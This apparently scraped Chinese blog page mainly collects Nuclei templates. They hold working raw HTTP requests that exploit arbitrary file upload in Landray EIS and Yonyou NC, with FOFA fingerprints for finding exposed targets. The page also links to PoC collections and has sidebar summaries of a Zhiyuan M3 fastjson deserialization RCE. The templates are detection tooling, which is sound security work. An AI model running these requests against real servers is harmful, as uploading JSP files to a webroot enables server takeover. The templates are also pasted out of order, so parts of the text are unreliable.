    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
        condition: and
id: landray-eis-saveimg-fileupload

info:
  name: 蓝凌eis智慧协同平台任意文件上传
  author: fgz
  severity: critical
  tags: landray,fileupload
  description: |
    蓝凌eis智慧协同平台是由深圳市微达软件有限公司开发的用于企业在知识,协同,项目管理等场景的OA系统。其存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
  metadata:
    max-request: 3
    fofa-query: icon_hash="953405444"
    hunter-query:
    verified: true

variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
  file_content: "{{to_lower(rand_text_alpha(26))}}"

http:
  - raw:
      - |
        POST /eis/service/api.aspx?action=saveImg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

        ------WebKitFormBoundaryxdgaqmqu
        Content-Disposition: form-data; name="file"filename="{{file_name}}"
        Content-Type: text/html
        
        {{file_content}}
        ------WebKitFormBoundaryxdgaqmqu--
          
      - |
        GET {{file_name2}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    extractors:
      - type: kval
        name: file_name2
        internal: true
        kval:
          - body
    matchers:
      - type: word
        words:
          - "{{file_content}}"
        part: body

模板 五

1.文件上传

2.正则表达式

id: yonyou-nc-accept-fileupload

info:
  name: 用友NC accept.jsp任意文件上传漏洞
  author: fgz
  severity: critical
  description: |
    用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
  reference:
    none
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1085941792"
  tags: yonyou,nc,fileupload,2023

variables:
  boundary: '{{rand_base(29)}}'

http:
  - raw:
      - |
        POST /aim/equipmap/accept.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=---------------------------{{boundary}}
        Accept-Encoding: gzip

        -----------------------------{{boundary}}
        Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.txt"
        Content-Type: text/plain

        <% out.println("{{randstr_2}}"); %>
        -----------------------------{{boundary}}
        Content-Disposition: form-data; name="fname"

        \webapps\nc_web\{{randstr_3}}.jsp
        -----------------------------{{boundary}}--
      - |
        GET /{{randstr_3}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
        condition: and

poc收集

一个正在更新的poc

https://github.com/Vme18000yuan/FreePOC/

https://github.com/MD-SEC/MDPOCS

ka_ka11
关注
致远M3 反序列化RCE漏洞复现(XVE-2023-24878)
0xSec
11-24 5467
致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
漏洞复现--致远 M3 反序列化 mobile_portal RCE
qq_53003652的博客
11-27 4691
M3server提供了多种功能模块,涵盖了办公自动化、项目管理、文档管理、流程管理、日程安排、知识管理等方面。再请求/mobile_portal/api/systemLog/pns/loadLog/app.log接口。严格限制/mobile_portal/接口的访问权限,关注厂家官网获取修复补丁。使用ysoserial生成CB链TomcatCmdEcho回显内存马。利用CB1链生成hex代码,替换POC中的HEX。执行命令,在请求内容加上cmd执行命令回显。致远M3 server。成功执行ping命令。
独家 | LLM的旅程:从POC(概念验证)到生产环境(上篇)
最新发布
数据派THU
08-27 139
作者:Adva Nakash Peleg 翻译:付雯欣 校对:赵茹萱 本文约3100字,建议阅读10分钟 本文将从实际项目需求出发,手把手带你了解LLM。图:由DALL-E生成的图片试想一下:你有一个很棒的项目想法,可以通过大语言模型(LLM)来实现,并且很快实现了一个可运行的概念验证(POC)。你为自己感到骄傲,并惊讶于你只需很少的工作就能使其发挥作用。(只需五行prompt的魔力☺)但...
致远M3-server 反序列化RCE漏洞
m0_71285176的博客
01-10 1721
致远M3 server中 mobile_portal接口处存在fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
致远M3-server反序列化RCE-未公开Day漏洞复现
weixin_43167326的博客
01-22 810
致远M3 server中 mobile_portal接口处存在fastjson反序列化漏洞,漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中,然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
致远M3移动办公系统平台存在敏感信息泄露/未授权访问漏洞
weixin_43167326的博客
05-07 1409
致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。
记一次渗透测试信息收集(子域名+端口)
爱玩游戏的黑客的博客
12-26 1486
信息收集(子域名+端口)
OSCS开源安全周报第 56 期:Apache Airflow Spark Provider 任意文件读取漏洞
zz12345600354的博客
04-26 819
OSCS 社区共收录安全漏洞 3 个,公开漏洞值得关注的是 Apache NiFi 连接 URL验证绕过漏洞(CVE-2023-40037)、PowerJob 未授权访问漏洞(CVE-2023-36106)、Apache Airflow SparkProvider 任意文件读取漏洞(CVE-2023-40272)。针对 NPM 、PyPI 仓库,共监测到 81 个不同版本的毒组件,其中 NPM 组件包 mall-front-babel-directive。
漏洞报告模板.docx
06-06
- **验证过程**:描述如何验证漏洞的有效性,比如通过编写POC代码、利用公开的漏洞利用框架等。 - **验证结果**:展示验证过程中收集到的数据,证明漏洞确实存在。 ##### 4. 弱口令 - **定义**:解释什么是弱口令...
工控安全 西门子S7-300攻击分析_plc300漏洞
2401_84264536的博客
04-27 1140
一、概述随着等保2.0的普及,工控安全大家也越来越重视,研究工控安全的小伙伴也越来越多。工控安全主要包括工控设备私有协议的安全分析,工控设备固件系统安全以及工控设备应用程序安全等。西门子PLC广泛应用于工业控制系统,本文主要描述西门子PLC系列S7-300的攻击过程与思路,并介绍演示一些适合小伙伴们学习的工控工具和框架。如有错误之处,欢迎指正,共同学习进步。
小白都不知道的互联网行业黑化大全
qq_67780151的博客
10-20 2908
词汇释义:指在改变原有的规则或者概念,多用在表达品牌作出升级或者调整措施后,要达到的目的或者能达到的高度。运用示例苹果用更智能的操作系统和使用方式,重新定义了手机打造人机交互智能系统,重新定义汽车行业词汇释义:在营销中,最后一公里指的是产品和消费者接触的最终场景。比如线下的渠道,消费者可直接提货至家里。以及线上购物,快递员最终对包裹进行的配送。总体来说,是消费者对企业交付产品本身的初体验。在传播中,可用于终端的布置陈列创意,或者对配送员以及包裹的创意植入。(相对的还有最初一公里)运用示例。
各类POC集合大全
04-26
各类POC集合大全 没细看 1000多个吧 需要的可以下载下来看看
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
【漏洞复现】致远-M3-信息泄露-mobile_portal
知黑而守白
07-05 250
致远OA移动智能办公平台mobile_portal接口处存在敏感信息泄露漏洞,未授权访问的日志文件泄露数据包括用户名、session和系统接口信息等,恶意攻击者可能利用该敏感信息对服务器进行进一步的攻击,从容团队服务器造成危害。致远OA移动智能办公平台是一款基于移动互联网和云计算技术的移动办公软件,为企业提供随时随地、安全高效的办公体验。1、限制接口访问权限。
致远M3 Session 敏感信息泄露漏洞复现
0xSec
05-07 1316
致远M3 server多个日志文件存在敏感信息泄露漏洞,允许未经身份验证的远程攻击者访问日志文件,泄露了登陆用户名及session等敏感信息,使系统处于极不安全的状态。
(1day)致远M3 log 敏感信息泄露漏洞(Session)复现
记录开发和安全学习过程中的点点滴滴
05-08 1559
系统学习web漏洞挖掘以及项目实战也有一段时间了,发现在漏洞挖掘过程中难免会碰到一些历史漏洞,来帮助自己或是提高自己挖洞和及时发现漏洞效率,于是开始创建这个专栏,对第一时间发现的1day以及历史漏洞进行复现,来让自己更加熟悉漏洞类型以及历史漏洞,方便自己在后续的项目实战中,碰到漏洞能够及时去查询和复现.
致远M3 log 敏感信息泄露漏洞
一个努力学习网安的小牛马
05-08 666
session信息泄露
POCSuite_POC_Collect:安全检测的新锐利器
gitblog_00065的博客
06-11 363
POCSuite_POC_Collect:安全检测的新锐利器 项目地址:https://gitcode.com/njcx/pocsuite_poc_collect 1、项目介绍 在网络安全领域,漏洞探测(Proof of Concept, PoC)是至关重要的工具之一。POCSuite_POC_Collect 是一个基于 POCSuite 框架的开源项目,专为自动化收集和测试各种PoC而设计。这个...
命令执行和反序列化漏洞
gududeajun的博客
12-11 2820
命令与代码执行漏洞 1、远程系统命令执行:一般出现这种漏洞,是因为应用系统在设计上需要给用户提供指定的远程命令接口,比如我们常用的防火墙、路由器、入侵检测等设备的web管理页面上一般给用户提供一个ping操作的web界面;用户从web界面输入目标ip,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。而设计者在完成该功能时,没有做严格的安全控制,那么攻击者就可以通过该接口提交“意想不到”的命令,从而让后台执行,从而控制整个后台服务器。 现在很多的甲方企业都开始实施自动化运维,大量的系统操作
移动蜂窝网PoC业务技术分析
"PoC技术,公网对讲机,技术实现,业务系统设计,SIP信令,IMS域,IP多媒体子系统,开放移动联盟" PoC(Push-to-Talk over Cellular)技术,也被称为“无线一键通”,是将传统的对讲机功能与移动蜂窝网络相结合的一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值